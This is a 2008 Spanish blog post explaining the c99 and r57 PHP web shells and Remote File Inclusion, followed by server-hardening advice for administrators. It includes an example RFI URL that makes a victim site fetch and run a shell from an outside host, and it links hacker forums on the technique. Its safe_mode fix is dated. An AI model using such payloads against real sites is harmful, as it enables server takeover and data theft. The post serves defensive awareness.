Telepieza´s Weblog

Muchas veces el desconocimiento de los informáticos sobre las herramientas utilizadas de  los hacker para entrar en nuestros ordenadores, nos hacen más vulnerables, aquí tenemos el logo del popular programa realizado en phpshell llamado r57shell.php o r57.txt o r57.php

Para solucionar dicha laguna iré explicando una serie de programas cogidos en un ordenador hackeado y a la vez con sus herramientas dejadas en el sistema por cerrar el firewall una vez dentro del servidor linux.

Son muchos los programas a exponer, pero vamos a empezar por dos programas PHPSHELL muy extendidos y son utilizados muy habitualmente por ellos (c99.txt o c99.php y el r57.txt o r57.php). La imagen corresponde al logo del c99.php.

Voy a ejecutar los programas en entorno Windows, pero lo suyo es en Linux, están más pensados en buscar y llevarse la información de vulnerabilidades de servidores con php , por ser dichos programas realizados en lenguaje PHP.

Dichos programas están catalogados en la técnica RFI (Remote File Inclusion) en español (Inclusión de Archivo remoto), se aprovecha de una vulnerabilidad en la programación de páginas web y que tengan instalado el modulo PHP, podemos insertar archivos añadiendo parámetros por la url del navegador. Si la instalación del php.ini está mal configurado, podemos hacer ejecutar nuestros archivos (c99.txt o r57.txt) en el servidor de la website o víctima.

Con un ejemplo se verá más claro:

http://www.victima.com/index.php?page=http://www.tuweb.com/c99.txt en dicho ejemplo renombramos  después a c99.php y ejecutar o http://www.victima.com/index.php?page=http://www.tuweb.com/c99.php? y ejecutas de forma automática.

Al insertar y ejecutar el programa desde nuestro servidor, ellos nos pueden ver todos nuestras carpetas de nuestra página web y analizar los tipos de ficheros y sus autorizaciones de lectura y escritura.

Si algunos de nuestros ficheros son de escritura, los agujeros más gordos a nivel de seguridad son :

• Nuestro index.html o index.php lo pueden alterar a su antojo.
• Redireccionar nuestra web cambiando el fichero .haccess
• Cambiar los datos de tu robots.txt.
• Añadir programas malignos para su ejecución en carpetas de escritura.
• Cambiar fotos, páginas y demás ficheros por otros.

Pero lo más grave aún no ha llegado, al poder entrar en tu sistema pueden visualizar los datos de los ficheros config.php o config.php.inc, dichos ficheros tienen la configuración del nombre, usuario y clave de acceso a la base de datos de nuestra aplicación.

Con dicha información y el programa del c99.php o r57.php se puede extraer todos los datos de la base de datos y llevarla a otro ordenador sin dejar rastro en el servidor, de esa forma el webmaster del Website no se percatará de la extración de datos y hackeo de su servidor.

Pero aún puede ser más grave, si dichas claves de la base de datos es igual a las claves de acceso a nuestro sistema o es un usuario de sistema con poder a Shell (root), a partir de aquí el dominio es total para nuestros hackers.

CONCLUSION Y SOLUCIONES:

• Ten los menos usuarios con Shell en tu sistema creados, como máximo dos uno el root (Linux) o Administrador (Windows) y otro de seguridad por si tienes problemas graves de entrada con los del sistema.
• Las contraseñas de dichos usuarios nunca tienen que ser colocadas en otros usuarios o repetidas en otros procesos como la Base de Datos MySql.
• Los usuarios de entrada a procesos de base de datos no pueden existir como usuarios de sistema.
• Limita las autorizaciones de los usuarios de tu base de datos a la mínima expresión para que no sean extraídos los datos de tu sistema de forma fácil si ellos consiguen la información por el fichero config.php
• Si tienes sistema operativo Windows, algunos anti-virus detectan como virus dichos programas, pero no es una garantía de seguridad.
• Si tienes sistema operativo Linux te aconsejo mirar el log del cron del usuario que arranca el apache. Los usuarios pueden ser apache, nobody o wwwrun. Ejecuta el comando : # crontab nobody -l o # crontab apache -l , si por casualidad te aparece algo parecido a : * * * * * * /var/tmp/nombreprograma es por tener un troyano y eliminalo de forma urgente, te han hackeado y van a por tí.

Pero no se me olvida lo más importante y es parametrizar bien tú php.ini y la solución para no activar dichos programas es indicar en la directiva “safe_mode = On”. en el fichero php.ini

El programa c99.php es muy extenso y tiene muchas funcionalidades, es cómo un pequeño programa phpMyAdmin pero con más funcionalidades aún.

Aquí tenemos una imagen del programa a nivel de cabecera, y podéis intuir las posibilidades tan grandes de información de dicho programa.

Para ver bien las imágenes picar encima de ella.

El programa en la cabecera ya intuimos todo su potencial y es :

• Información del Apache, S.O., SSL y PHP
• Información sobre la directiva safe-mode
• Los directorios del Apache son de Lectura, Escritura y Ejecución
• Capacidad del Disco para meter ellos sus programas
• Todos los Driver (Discos, Disketes, CD y demás dispositivos)
• Y un menú del todo sugerente (Ftp, Tools, Seguridad, Procesos, Sql, E-Mail, Directorios y demás herramientas)

Cada vez que picas en alguna opción del menú abajo te sale una consola con la información buscada y unos campos para introducir la información a extraer o consultar por el hacker.

Para mí el más dañino es el c99.php, pero el más sorprendente a nivel visual es el r57.txt por presentarse todo su potencial al arranque del programa, ves los datos a solicitar del FTP, E-MAIL y SQL en un sola ojeada. Los que saben de informática y son administradores se quedan impresionados por la foto visual del programa.

Para ver mejor la foto picar encima de la imagen, las he dividido en tres partes por no coger en el visualizador de la galería.

Datos que introduce el hacker para extraer o enviar información vía FTP

Datos a introducir el hacker para extraer o enviar información vía E-MAIL

Datos a introducir el hacker para extraer o consultar datos de nuestra Base de Datos, las bases de datos son mysql, mssql, postgresql.

Nota de Telepieza

Pero si quieres saber más sobre dicha técnica es mejor ir a los foros de los hacker y algunos de sus post son :

• Hoy toca explicar la técnica RFI (www.wf-zone.us/showthread.php)
• Video Tutorial de la técnica RFI (Video de Hackerarray.mforos.com)
• Gente discutiendo la técnica RFI (Foro de Discusión RFI)

…………………………. SALUDOS DE TELEPIEZA ………………….

Esta entrada fue escrita el Domingo, 8 de junio de 2008 a las 0:10 y archivada en Seguridad. Puedes seguir cualquier respuesta a esta entrada a través del feed RSS 2.0. Puedes dejar una respuesta, o trackback desde tu propio sitio web.